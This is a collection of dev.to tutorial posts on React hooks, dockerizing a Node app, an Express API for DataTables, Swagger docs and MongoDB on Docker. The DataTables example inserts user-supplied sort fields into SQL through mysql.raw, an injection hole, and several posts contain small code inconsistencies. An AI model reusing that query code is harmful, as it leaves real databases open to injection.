same Slack channel. Here is a full video of the Slack bot in action. {% embed https://x.com/GanatraSoham/status/1806468014105301334 %} --- ## Let's connect! 🔌 You can join our community to engage with maintainers and contribute as an open-source developer. Don't hesitate to visit our GitHub repository to contribute and create issues related to Composio. The source for this tutorial is available here, also check out the implementation with other frameworks: {% cta https://github.com/ComposioHQ/composio/blob/feat/slack-assistant/python/examples/slack_bot_agent/readme.md %} Full code of the AI Slack Bot ✨{% endcta %} Thank you for reading!
sunilkumrdash
1,920,465
Top 6 React Hook Mistakes Beginners Make
The hardest part about learning react is not actually learning how to use react but instead learning...
0
2024-07-14T16:46:04
https://dev.to/markliu2013/top-6-react-hook-mistakes-beginners-make-1135
react
The hardest part about learning react is not actually learning how to use react but instead learning how to write good clean react code. In this article, I will talk about 6 mistakes that I see almost everyone making with the useState and useEffect hook. ## Mistake 1, Using state when you don't need it The very first mistake that I want to talk about is using state when you don't actually need any state. Let's take a look at this example. ```jsx import {useState} from "react"; const App = () => { const [email, setEmail] = useState('') const [password, setPassword] = useState('') function onSubmit(e) { e.preventDefault(); console.log({ email, password }); } return ( <form onSubmit={onSubmit}> <label htmlFor="email">Email</label> <input value={email} onChange={e => setEmail(e.target.value)} type="email" id="email" /> <label htmlFor="password">Password</label> <input value={password} onChange={e => setPassword(e.target.value)} type="password" id="password" /> <button type="submit">Submit</button> </form> ) }; export default App; ``` We use email and password state here, but the problem is we only care the email and password value when submit the form, we don't need re-render when email and password updated, so instead of tracking the state, and re-render every time I typed a character, I am going to store these inside of a ref. ```jsx import { useRef } from "react"; const App = () => { const emailRef = useRef(); const passwordRef = useRef(); function onSubmit(e) { e.preventDefault(); console.log({ email: emailRef.current.value, password: passwordRef.current.value }); } return ( <form onSubmit={onSubmit}> <label htmlFor="email">Email</label> <input ref={emailRef} type="email" id="email" /> <label htmlFor="password">Password</label> <input ref={passwordRef} type="password" id="password" /> <button type="submit">Submit</button> </form> ) }; export default App; ``` If you click the submit, and look at the console again, it will print the values. You don't need any state at all for this. So the first tip for you is thinking do you really need to use states, and re-render the components every time state changes, or can you use a ref if you don't need re-render the components. Also you can access the data in the form directly, so you don't need refs too. ```jsx import { useRef } from "react"; const App = () => { function onSubmit(event) { event.preventDefault(); const data = new FormData(event.target); console.log(data.get('email')); console.log(data.get('password')); fetch('/api/form-submit-url', { method: 'POST', body: data, }); } return ( <form onSubmit={onSubmit}> <label htmlFor="email">Email</label> <input type="email" name="email" id="email" /> <label htmlFor="password">Password</label> <input type="password" name="password" id="password" /> <button type="submit">Submit</button> </form> ) }; export default App; ``` ## Mistake 2, Not using the function version of useState Let's take a look at this example. ```jsx import { useState } from "react"; export function Counter() { const [count, setCount] = useState(0); function adjustCount(amount) { setCount(count + amount); setCount(count + amount); } return ( <> <button onClick={ () => adjustCount(-1) }> - </button> <span> {count} </span> <button onClick={ () => adjustCount(1) }> + </button> </> ) } ``` If you click the button, the count will update only once, even you `setCount` twice. This is because when the second setCount trigger, the first setCount not finished, the count value is not updated. You should use function version to fix this problem. https://legacy.reactjs.org/docs/hooks-reference.html#functional-updates ```jsx import { useState } from "react"; export function Counter() { const [count, setCount] = useState(0); function adjustCount(amount) { setCount(prevCount => prevCount + amount); setCount(prevCount => prevCount + amount); } return ( <> <button onClick={ () => adjustCount(-1) }> - </button> <span> {count} </span> <button onClick={ () => adjustCount(1) }> + </button> </> ) } ``` ## Mistake 3, State dose not update immediately Let's take a look at this example. ```jsx import { useState } from "react"; export function Counter() { const [count, setCount] = useState(0); function adjustCount(amount) { setCount(prevCount => prevCount + amount); // count is the value before setCount console.log(count); } return ( <> <button onClick={ () => adjustCount(-1) }> - </button> <span> {count} </span> <button onClick={ () => adjustCount(1) }> + </button> </> ) } ``` When you update your state variable, it actually doesn't change right away, it doesn't change until next render, so instead of putting code after your state setter, you should use useEffect. ```jsx import {useEffect, useState} from "react"; export function Counter() { const [count, setCount] = useState(0); useEffect(() => { console.log(count); }, [count]) function adjustCount(amount) { setCount(prevCount => prevCount + amount); } return ( <> <button onClick={ () => adjustCount(-1) }> - </button> <span> {count} </span> <button onClick={ () => adjustCount(1) }> + </button> </> ) } ``` ## Mistake 4, Unnecessary useEffect Let's take a look at this example. ```jsx import { useEffect, useState } from "react"; const App = () => { const [firstName, setFirstName] = useState('') const [lastName, setLastName] = useState('') const [fullName, setFullName] = useState('') useEffect(() => { setFullName(`${firstName} ${lastName}`); }, [firstName, lastName]) return ( <> <input value={firstName} onChange={ e => setFirstName(e.target.value) } /> <input value={lastName} onChange={ e => setLastName(e.target.value) } /> {fullName} </> ) }; export default App; ``` The problem is when we update firstName or lastName, the state fullName will update and re-render component again, it re-render twice. How to make it to be optimal. ```jsx import { useState } from "react"; const App = () => { const [firstName, setFirstName] = useState(''); const [lastName, setLastName] = useState(''); const fullName = `${firstName} ${lastName}`; return ( <> <input value={firstName} onChange={ e => setFirstName(e.target.value) } /> <input value={lastName} onChange={ e => setLastName(e.target.value) } /> {fullName} </> ) }; export default App; ``` ## Mistake 5, Referential equality mistakes Let's take a look at this example. ```jsx import {useEffect, useState} from "react"; const App = () => { const [age, setAge] = useState(0); const [name, setName] = useState(''); const [darkMode, setDarkMode] = useState(false); const person = { age, name }; useEffect(() => { console.log(person) }, [person]) return ( <div style={{ background: darkMode ? "#333" : "#fff" }}> Age: {" "} <input value={age} type="number" onChange={ e => setAge(e.target.value)} /> <br/> Name: <input value={name} onChange={ e => setName(e.target.value) } /> <br/> Dark Mode: {" "} <input type="checkbox" value={darkMode} onChange={e => setDarkMode(e.target.checked)} /> </div> ) }; export default App; ``` If you change age or name, useEffect function will be triggered, but if you toggle darkMode, the useEffect function triggered too, this is not what we expected. There are two key point make this happen. Firstly, Each render has its own props and state, so the variable person will be initialize as a new one. Checkout this article, if you want to study this in detail, [https://overreacted.io/a-complete-guide-to-useeffect/](https://overreacted.io/a-complete-guide-to-useeffect) The second point is Referential equality, [https://barker.codes/blog/referential-equality-in-javascript/](https://barker.codes/blog/referential-equality-in-javascript/) so the variable person is not equal when darkMode updated. We can use [useMemo](https://react.dev/reference/react/useMemo) to fix this problem. ```jsx import {useEffect, useMemo, useState} from "react"; const App = () => { const [age, setAge] = useState(0); const [name, setName] = useState(''); const [darkMode, setDarkMode] = useState(false); const person = useMemo(() => { return { age, name } }, [age, name]) useEffect(() => { console.log(person) }, [person]) return ( <div style={{ background: darkMode ? "#333" : "#fff" }}> Age: {" "} <input value={age} type="number" onChange={ e => setAge(e.target.value)} /> <br/> Name: <input value={name} onChange={ e => setName(e.target.value) } /> <br/> Dark Mode: {" "} <input type="checkbox" value={darkMode} onChange={e => setDarkMode(e.target.checked)} /> </div> ) }; export default App; ``` ## Mistake 6, Not aborting fetch requests Let's take a look at this example. ```jsx import {useEffect, useState} from "react"; export function useFetch(url) { const [loading, setLoading] = useState(true); const [data, setData] = useState(); const [error, setError] = useState(); useEffect(() => { setLoading(true) fetch(url) .then(setData) .catch(setError) .finally(() => setLoading(false)) }, [url]) } ``` The problem in this example is when the component unmounted, or url changed, the previous fetch still working in the background, it will work not as expect in many situation, checkout out this article in detail, https://plainenglish.io/community/how-to-cancel-fetch-and-axios-requests-in-react-useeffect-hook We can fix this problem using AbortController. ```jsx import {useEffect, useState} from "react"; export function useFetch(url) { const [loading, setLoading] = useState(true); const [data, setData] = useState(); const [error, setError] = useState(); useEffect(() => { const controller = new AbortController(); setLoading(true) fetch(url, { signal: controller.signal }) .then(setData) .catch(setError) .finally(() => setLoading(false)) return () => { controller.abort(); } }, [url]) } ``` This article is based on this youtube video. https://www.youtube.com/watch?v=GGo3MVBFr1A
markliu2013
1,920,504
Node Docker App
Our Funda is very simple. Just create a simple nodeJs app and dockerize it docker hub😘 ... Step 0:...
0
2024-07-13T05:00:00
https://dev.to/nisharga_kabir/node-docker-app-2f1e
docker, nodeapp, node, javascript
Our Funda is very simple. Just create a simple nodeJs app and dockerize it docker hub😘 ... Step 0: create a folder and create a package.json file. and copy these code ``` { "name": "nodejs-image-demo", "version": "1.0.0", "description": "nodejs image demo", "author": "Nisharga Kabir", "license": "MIT", "main": "app.js", "keywords": [ "nodejs", "bootstrap", "express" ], "dependencies": { "express": "^4.16.4" } } ``` then do this command ``` npm install ``` This is nothing... just npm init and and doing some answers we can easily make this. but for fast going we ignore this process. Please make sure you have installed node js and docker on your PC. (you will find lots of videos on YouTube to install docker and nodejs) Let's Start the Game 😍😍😍 ## Step 1: create **app.js** on root and peast this code ``` const express = require("express"); const app = express(); const router = express.Router(); const path = __dirname + "/views/"; const port = 8080; router.use(function (req, res, next) { console.log("/" + req.method); next(); }); router.get("/", function (req, res) { res.sendFile(path + "index.html"); }); router.get("/sharks", function (req, res) { res.sendFile(path + "sharks.html"); }); app.use(express.static(path)); app.use("/", router); app.listen(port, function () { console.log("Example app listening on port 8080!"); }); ``` This code says nothing. First, we do a basic setup of express. Then we got pathName and port for future use. _ _ dirname is the absolute path of a file. Next, we use console.log to see what request we are doing. Using res.sendFile we say / will be the index.html route And /sharks will be sharks.html route Finally specifically said path and app. use router ## Step 2: create two file **views/index.html** and **views/sharks.html** (make sure to create views folder) **index.html** ``` <!DOCTYPE html> <html lang="en"> <head> <title>About Sharks</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous"> <link href="css/styles.css" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Merriweather:400,700" rel="stylesheet" type="text/css"> </head> <body> <nav class="navbar navbar-dark bg-dark navbar-static-top navbar-expand-md"> <div class="container"> <button type="button" class="navbar-toggler collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> </button> <a class="navbar-brand" href="#">Everything Sharks</a> <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"> <ul class="nav navbar-nav mr-auto"> <li class="active nav-item"><a href="/" class="nav-link">Home</a> </li> <li class="nav-item"><a href="/sharks" class="nav-link">Sharks</a> </li> </ul> </div> </div> </nav> <div class="jumbotron"> <div class="container"> <h1>Want to Learn About Sharks?</h1> <p>Are you ready to learn about sharks?</p> <br> <p><a class="btn btn-primary btn-lg" href="/sharks" role="button">Get Shark Info Now</a> </p> </div> </div> <div class="container"> <div class="row"> <div class="col-lg-6"> <h3>Not all sharks are alike</h3> <p>Though some are dangerous, sharks generally do not attack humans. Out of the 500 species known to researchers, only 30 have been known to attack humans. </p> </div> <div class="col-lg-6"> <h3>Sharks are ancient</h3> <p>There is evidence to suggest that sharks lived up to 400 million years ago. </p> </div> </div> </div> </body> </html> ``` **sharks.html** ``` <!DOCTYPE html> <html lang="en"> <head> <title>About Sharks</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous"> <link href="css/styles.css" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Merriweather:400,700" rel="stylesheet" type="text/css"> </head> <nav class="navbar navbar-dark bg-dark navbar-static-top navbar-expand-md"> <div class="container"> <button type="button" class="navbar-toggler collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> </button> <a class="navbar-brand" href="/">Everything Sharks</a> <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"> <ul class="nav navbar-nav mr-auto"> <li class="nav-item"><a href="/" class="nav-link">Home</a> </li> <li class="active nav-item"><a hreaf="/sharks" class="nav-link">Sharks</a> </li> </ul> </div> </div> </nav> <div class="jumbotron text-center"> <h1>Shark Info</h1> </div> <div class="container"> <div class="row"> <div class="col-lg-6"> <p> <div class="caption">Some sharks are known to be dangerous to humans, though many more are not. The sawshark, for example, is not considered a threat to humans. </div> <img src="https://assets.digitalocean.com/articles/docker_node_image/sawshark.jpg" alt="Sawshark"> </p> </div> <div class="col-lg-6"> <p> <div class="caption">Other sharks are known to be friendly and welcoming!</div> <img src="https://assets.digitalocean.com/articles/docker_node_image/sammy.png" alt="Sammy the Shark"> </p> </div> </div> </div> </html> ``` Finally **views/css/style.css** ``` .navbar { margin-bottom: 0; } body { background: #020A1B; color: #ffffff; font-family: 'Merriweather', sans-serif; } h1, h2 { font-weight: bold; } p { font-size: 16px; color: #ffffff; } .jumbotron { background: #0048CD; color: white; text-align: center; } .jumbotron p { color: white; font-size: 26px; } .btn-primary { color: #fff; text-color: #000000; border-color: white; margin-bottom: 5px; } img, video, audio { margin-top: 20px; max-width: 80%; } div.caption: { float: left; clear: both; } ``` Now do this command `node app.js` This command will start the server and you will start your node app 🙂 And visit this URL `http://localhost:8080/` you will see your app running. I am not describing code here. If you are here to learn node-docker I believe you already know HTML,CSS, and Bootstrap 😎😎😎 ## Step 3: DockerFile create Create `Dockerfile` on root and peast this code ``` FROM node:16-alpine WORKDIR /app COPY . . RUN npm install EXPOSE 3000 CMD [ "node", "app.js" ] ``` we just say brother. take version 16 (alphine lite version) when you create container inside that app folder our app code will store. copy everything. this install all dependency and finally run it 3000 port with node command 😎 `.dockerignore` create on root ``` node_modules; npm - debug.log; Dockerfile.dockerignore; ``` this is just because we don't want node_modules folder and others stuff. 😎 ## Step 4: Build And Run open docker app first then `docker build -t your_dockerhub_username/nodejs-image-demo .` I am doing here `docker build -t nisharga/nodeapp .` We are doing this command. -t means tagname we do it blank but if you wants you can set 🙂 Lets check image created or not by this command `docker images` REPOSITORY TAG IMAGE ID CREATED SIZE We see more about these……. Repo is name. Tag is version id is specific thing. Created is time and size is size NOW ITS TIME TO BUILD AND RUN 😀 `docker build -t nkapp . && docker run -p 1200:8080 nkapp` Now just do these command, -t means tagName -p means port. -p 1200:8080 means our app is running on port 8080 and we are now running our docker app in 1200 port override 8080. `http://localhost:1200/` Visit these URL you will see live app from docker build file. ## Step 5: Push the code to docker hub First register in hub.docker then do these command `docker login -u DOCKER_NAME ` Then write password and login 🙂 Now Docker image Push to hubDocker `docker build -t nisharga/nkapp2:latest .` `docker push nisharga/nkapp2:latest` I am building twice to remove confusion. I believe you are already familiar with GitHub. so you already know githubUserName/RepoName/branchName here 100% same to same to same thing. BranchName called here tagName. Repo is using appName. The username is used here dockerUser. Now visit Docker Hub to see your code on docker. Now you can share with dockerize image with anyone, does not matter what device he is using he can easily run it with docker app 😎😎😎😎😎😎 **Github Source Code:** https://github.com/nisharga/node-docker
nisharga_kabir
1,920,615
Create an API for DataTables with Express
DataTables is a popular jQuery plugin that offers features like pagination, searching, and sorting,...
0
2024-07-15T02:36:26
https://blog.stackpuz.com/create-an-api-for-datatables-with-express/
express, datatables
--- title: Create an API for DataTables with Express published: true date: 2024-07-12 08:25:00 UTC tags: Express,DataTables canonical_url: https://blog.stackpuz.com/create-an-api-for-datatables-with-express/ --- ![Express API for DataTables](https://blog.stackpuz.com/media/posts/9/cover.jpg) DataTables is a popular jQuery plugin that offers features like pagination, searching, and sorting, making it easy to handle large datasets. This article will demonstrate how to create an Express API to work with the DataTables. What are the parameters that DataTables sends to our API and the requirements of the data that DataTables needs. To deal with DataTables, you need to understand the information that DataTables will send to the API through the query string. ```javascript draw = 1 columns[0][data] = id columns[0][name] = columns[0][searchable] = true columns[0][orderable] = true columns[0][search][value] = columns[0][search][regex] = false columns[1][data] = name columns[1][name] = columns[1][searchable] = true columns[1][orderable] = true columns[1][search][value] = columns[1][search][regex] = false columns[2][data] = price columns[2][name] = columns[2][searchable] = true columns[2][orderable] = true columns[2][search][value] = columns[2][search][regex] = false order[0][column] = 0 order[0][dir] = asc order[0][name] = start = 0 length = 10 search[value] = search[regex] = false ``` - `draw` the request ID that is used to synchronize between the client and server. - `columns[x][data]` the column's field name that we define on the client-side. - `order[0]` the sorting information. - `start` the start index of the record. We do not use it, because Spring Boot pagination uses a page index instead. We will write some JavaScript to generate this page index later. - `length` the length per page (page size). - `search[value]` the search value information. The DataTables expected data will require these information. - `draw` DataTables sends this ID to us, and we just send it back. - `recordsTotal` Total records number before filtering. - `recordsFiltered` Total records number after filtering. - `data` The records data. ## Prerequisites - Node.js - MySQL ## Setup project Setting up the Node.js project dependencies. ``` npm install express mysql2 ``` Create a testing database named "example" and run the [database.sql](https://github.com/StackPuz/Example-Datatables-Express/blob/main/database.sql) file to import the table and data. ## Project structure ``` ├─ config.js ├─ index.js └─ public └─ index.html ``` ## Project files ### config.js This file contains the database connection information. ```javascript module.exports = { host: 'localhost', database: 'example', user: 'root', password: '' } ``` ### index.js This file is the main entry point for the Express application. It will create and setup the Express server. Because this API only has one routing URL, we will include it and the handler function in this file. ```javascript const express = require('express') const mysql = require('mysql') const util = require('util') const config = require('./config') let con = mysql.createConnection({ host: config.host, database: config.database, user: config.user, password: config.password }) let query = util.promisify(con.query).bind(con) let app = express() app.use(express.static('public')) app.get('/api/products', async (req, res) => { let size = parseInt(req.query.length) || 10 let start = parseInt(req.query.start) let order = mysql.raw((req.query.order && req.query.columns[req.query.order[0].column].data) || 'id') let direction = mysql.raw((req.query.order && req.query.order[0].dir) || 'asc') let params = [order, direction, size, start] let search = req.query.search.value let sql = 'select * from product' if (search) { search = `%${search}%` sql = 'select * from product where name like ?' params.unshift(search) } let recordsTotal = (await query('select count(*) as count from product'))[0].count let recordsFiltered = (await query(sql.replace('*', 'count(*) as count'), search))[0].count let data = (await query(`${sql} order by ? ? limit ? offset ?`, params)) res.send({ draw: req.query.draw, recordsTotal, recordsFiltered, data }) }) app.listen(8000) ``` - `mysql.createConnection()` will create the database connection. - `express.static('public')` will serve the static resource inside the public folder. (We used to serve index.html as a default page) - We utilize the query string to get `size, start, order, direction` information to create the paginated data by using the `limit` and` offset` of the SQL query. - We return all DataTables required information including: `draw, recordsTotal, recordsFiltered, data` as object. ### index.html This file will be used to setup the DataTables HTML and JavaScript to work with our API. ```html <!DOCTYPE html> <head> <link rel="stylesheet" href="https://cdn.datatables.net/2.0.7/css/dataTables.dataTables.min.css"> </head> <body> <table id="table" class="display"> <thead> <td>id</td> <th>name</th> <th>price</th> </thead> </table> <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script> <script src="https://cdn.datatables.net/2.0.7/js/dataTables.min.js"></script> <script> new DataTable('#table', { ajax: '/api/products', processing: true, serverSide: true, columns: [ { data: 'id' }, { data: 'name' }, { data: 'price' } ] }) </script> </body> </html> ``` - `processing: true` show a loading indicator when making the request. - `serverSide: true` makes the request to the server (API) for all operations. ## Run project ``` node index.js ``` Open the web browser and goto http://localhost:8000 You will find this test page. ![test page](https://blog.stackpuz.com/media/posts/9/default.png) ## Testing ### Page size test Change page size by selecting 25 from the "entries per page" drop-down. You will get 25 records per page, and the last page will change from 10 to 4. ![page size test](https://blog.stackpuz.com/media/posts/9/page-size.png) ### Sorting test Click on the header of the first column. You will see that the id column will be sorted in descending order. ![sorting test](https://blog.stackpuz.com/media/posts/9/sort.png) ### Search test Enter "no" in the search text-box, and you will see the filtered result data. ![search test](https://blog.stackpuz.com/media/posts/9/search.png) ## Conclusion In this article, you have learned how to create an Express API to work with the DataTables. Understand all the DataTables parameters sent to the API and utilize them to produce the appropriate data and send it back. You also learn how to setup the DataTables on the client-side using HTML and JavaScript. I hope this article will help you incorporate them into your next project. Source code: [https://github.com/stackpuz/Example-DataTables-Express](https://github.com/stackpuz/Example-DataTables-Express) Create a CRUD Web App in Minutes: [https://stackpuz.com](https://stackpuz.com)
stackpuz
1,920,788
Creating API Documentation with Swagger on NodeJS
Introduction Swagger is a popular, simple, and user-friendly tool for creating APIs. Most...
27,954
2024-07-13T03:00:00
https://howtodevez.blogspot.com/2024/04/creating-api-documentation-with-swagger-on-nodejs.html
node, typescript, beginners, backend
Introduction ------------ **Swagger** is a popular, simple, and user-friendly tool for creating **APIs**. Most backend developers, regardless of the programming languages they use, are familiar with **Swagger**. This article will guide you through creating API documentation using **Swagger** on **Node.js** (specifically integrated with the **Express** framework). This is handy when you want to provide API documentation in a professional UI format for stakeholders involved in integration. ![NodeJS Swagger](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fs4pe4us61xrf3qncgig.png) Restful API ----------- **REST** stands for **Representational State Transfer**. It is an architectural style that defines a set of constraints for creating web services. **RESTful APIs** provide a simple and flexible way to access web services without complex processing. Common HTTP Methods in **RESTful APIs**: \- **GET**: Used to read (retrieve) a representation of a resource. It returns data in XML or JSON format. \- **POST**: Creates new resources or subordinates to existing ones. \- **PUT**: Updates existing resources or creates new ones if the client chooses the resource ID. \- **PATCH**: Partially modifies resources, describing changes rather than sending the entire resource. \- **DELETE**: Removes a resource. Building API and API Documentation with Swagger ----------------------------------------------- In this example, we'll use **Node.js, Express, and Swagger**. First, let's set up a **Node.js** project and install the necessary packages: ```sh yarn add express swagger-jsdoc swagger-ui-express yarn add -D @types/swagger-jsdoc @types/swagger-ui-express ``` Create a file named **_swagger.ts_** with Swagger document configuration as follows: ```ts import * as swaggerJsdoc from 'swagger-jsdoc' import * as swaggerUi from 'swagger-ui-express' const options = { definition: { openapi: '3.0.0', info: { title: 'Employee API', description: 'Example of CRUD API ', version: '1.0.0', }, }, apis: ['./router/*.ts'], // path to routers } const swaggerSpec = swaggerJsdoc(options) export function swaggerDocs(app, port) { app.use('/docs', swaggerUi.serve, swaggerUi.setup(swaggerSpec)) app.get('/docs.json', (req, res) => { res.setHeader('Content-Type', 'application/json') res.send(swaggerSpec) }) } ``` Next up is the **_index.ts_** file for integrating **Express** and **Swagger**. ```ts import * as express from 'express' import router from './router' import {swaggerDocs} from './swagger' const app = express() const port = 3000 app .use(express.json()) .use(router) .listen(port, () => { console.log(`Listening at http://localhost:${port}`) swaggerDocs(app, port) }) ``` To set up the **API** routers, I'll create a file named router.ts and define the API documentation right above the routers, identified by the keyword **_@openapi_**. The APIs will include 4 methods: **GET, POST, PUT, DELETE**. ```ts import * as express from 'express' import {addEmployeeHandler, deleteEmployeeHandler, editEmployeeHandler, getEmployeesHandler} from './controller' const router = express.Router() /** * @openapi * '/api/employees': * get: * tags: * - Employee * summary: Get all employee * responses: * 200: * description: Success * content: * application/json: * schema: * type: array * items: * type: object * properties: * id: * type: number * name: * type: string * 400: * description: Bad request */ router.get('/api/employees', getEmployeesHandler) /** * @openapi * '/api/employee': * post: * tags: * - Employee * summary: Create a employee * requestBody: * required: true * content: * application/json: * schema: * type: object * required: * - id * - name * properties: * id: * type: number * name: * type: string * responses: * 201: * description: Created * 409: * description: Conflict * 404: * description: Not Found */ router.post('/api/employee', addEmployeeHandler) /** * @openapi * '/api/employee': * put: * tags: * - Employee * summary: Modify a employee * requestBody: * required: true * content: * application/json: * schema: * type: object * required: * - id * - name * properties: * id: * type: number * name: * type: string * responses: * 200: * description: Modified * 400: * description: Bad Request * 404: * description: Not Found */ router.put('/api/employee', editEmployeeHandler) /** * @openapi * '/api/employee/{id}': * delete: * tags: * - Employee * summary: Remove employee by id * parameters: * - name: id * in: path * description: The unique id of the employee * required: true * responses: * 200: * description: Removed * 400: * description: Bad request * 404: * description: Not Found */ router.delete('/api/employee/:id', deleteEmployeeHandler) export default router ``` I'll also provide an additional file named **_controller.ts_**, implemented in a simple way to handle API requests. ```ts import {Request, Response} from 'express' let employees = [ {id: 1, name: 'Name 1'}, {id: 2, name: 'Name 2'}, ] export function getEmployeesHandler(req: Request, res: Response) { res.status(200).json(employees) } export function addEmployeeHandler(req: Request, res: Response) { if (employees.find(employee => employee.id === req.body.id)) { res.status(409).json('Employee id must be unique') } else { employees.push(req.body) res.status(200).json(employees) } } export function deleteEmployeeHandler(req: Request, res: Response) { const index = employees.findIndex(employee => employee.id === +req?.params?.id) if (index >= 0) { employees.splice(index, 1) res.status(200).json(employees) } else { res.status(400).send() } } export function editEmployeeHandler(req: Request, res: Response) { const index = employees.findIndex(employee => employee.id == req.body.id) if (index >= 0) { employees.splice(index, 1, req.body) res.status(200).json(employees) } else { res.status(400).send() } } ``` After successfully starting the project, you can access the page **_[http://localhost:3000/docs](http://localhost:3000/docs)_** to view the API documentation in UI format generated by Swagger. ![RestFul API Swagger](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2wcje649g6uxojmg3ige.png) Conclusion ---------- API Documentation is one of the crucial documents that **back-end** developers provide to stakeholders to facilitate integration (such as **front-end** teams). Due to the popularity and convenience of **Restful API** and **Swagger**, it's an indispensable tool for creating API documentation in a simple, professional, and consistent UI format. **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/creating-api-documentation-with-swagger-on-nodejs.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,920,801
Using MongoDB on Docker
Introduction MongoDB is a widely popular NoSQL database today due to its simplicity and...
28,046
2024-07-15T03:00:00
https://howtodevez.blogspot.com/2024/04/using-mongodb-on-docker.html
docker, beginners, mongodb, node
Introduction ------------ **MongoDB** is a widely popular **NoSQL** database today due to its simplicity and several advantages over relational databases. Through this guide, you'll learn how to quickly use **MongoDB** within **Docker** without going through many complex installation steps. Note that before starting, you need to have **Docker** installed on your machine. ![MongoDB Docker](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qsbb74au1sja747z529t.png) Starting MongoDB on Docker -------------------------- You just need to execute the following command: ```sh docker run -e MONGO_INITDB_ROOT_USERNAME=username -e MONGO_INITDB_ROOT_PASSWORD=password --name mongo -p 27017:27017 -v /data/db:/data/db -d mongo ``` **Explanation of the command:** \- \`-e MONGO\_INITDB\_ROOT\_USERNAME=username -e MONGO\_INITDB\_ROOT\_PASSWORD=password\`: Sets environment variables for **MongoDB** initialization. You can replace "username" and "password" with your desired credentials. \- \`--name mongo\`: Sets the name for the container. \- \`-p 27017:27017\`: Exposes the **MongoDB** port for usage. \- \`-v /data/db:/data/db\`: Mounts a volume from the container to the host machine. \- \`-d\`: Starts the container in daemon mode. \- \`mongo\`: Specifies the image name, typically it would be **_mongo:latest_**. After executing the command, if your machine doesn't have **MongoDB** installed, **Docker** will pull the **_mongo_** image to use. Subsequent executions will directly run the image. ### Some MongoDB Queries After successfully running **MongoDB** on **Docker**, let's try connecting to **MongoDB** and executing some simple commands as follows: First, connect to **MongoDB** like this: ```sh docker exec \-it mongo mongosh "mongodb://127.0.0.1:27017" \--username username ``` After that, you will be prompted to enter the password to continue. ### Creating another account Execute the following commands one by one: ```sql use admin -- switch to db admin -- create new user db.createUser({ user: 'username2', pwd: 'password2', roles: [{ role: 'readWrite', db: 'test2' }] }) show users -- list all users ``` ![User creation successful](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jb6hdgmt5zly5pn21pqe.png) ### Inserting data into a collection Execute the following commands to insert data into a collection. If the collection does not exist, it will be created: ```sql -- db.{collection name}.insertOne db.tests.insertOne({ name: 'Alice', age: 30, }); db.tests.insertMany([ { name: 'Bob', age: 25 }, { name: 'Charlie', age: 35 }, ]); -- list all document db.test.find() ``` ![Data insertion successful](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gbu36tz0wdp42xvu1pqz.png) ### Connecting to MongoDB on NodeJS I'll provide a straightforward demo using **NodeJS** and **_mongoose_** to connect to **MongoDB** like this: ```ts import mongoose, {Schema} from 'mongoose' const host = 'mongodb://username:password@127.0.0.1:27017' const conn = mongoose.createConnection(host) const UserSchema = new Schema({ name: String, age: Number, email: String, }) // create if not exist, map with `users` collection const User = conn.model('user', UserSchema) const newUser = new User({ name: 'name', age: 20, email: 'name@email.com', }) await newUser.save() const userData = await User.find() console.log('Users', userData) ``` **_Please like and share if you found this post helpful. Your support motivates me to create more valuable content!_** **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/using-mongodb-on-docker.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,921,773
获客霸屏机器人
